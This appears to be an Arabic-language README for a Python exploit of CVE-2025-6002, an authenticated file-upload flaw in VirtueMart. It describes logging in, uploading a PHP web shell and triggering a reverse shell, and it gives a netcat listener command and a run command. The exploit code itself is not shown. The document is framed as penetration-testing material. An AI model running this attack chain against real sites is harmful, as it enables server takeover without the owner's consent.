
استغلال بايثون لـ CVE-2025-6002 يستهدف رفع الملفات التعسفي المصادق عليه في VirtueMart < 4.4.10. يسجل الدخول، ويرفع قشرة ويب PHP، ويطلق قشرة عكسية لاختبار الاختراق.
يستغل هذا السكربت ثغرة رفع الملفات الاعتباطية بعد المصادقة في VirtueMart < 4.4.10 (CVE-2025-6002)، والموصوفة في هذه التدوينة: https://blog.blacklanternsecurity.com/p/doomla-zero-days
يسجّل هذا السكربت الدخول إلى VirtueMart باستخدام بيانات الاعتماد المقدمة، وينشئ منتجًا جديدًا ويرفع قشرة ويب PHP كملف وسائط. ثم يستدعي قشرة عكسية إلى عنوان IP/المنفذ المقدم.
المعلمات:
الاستخدام:
nc -nlvp 1337
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337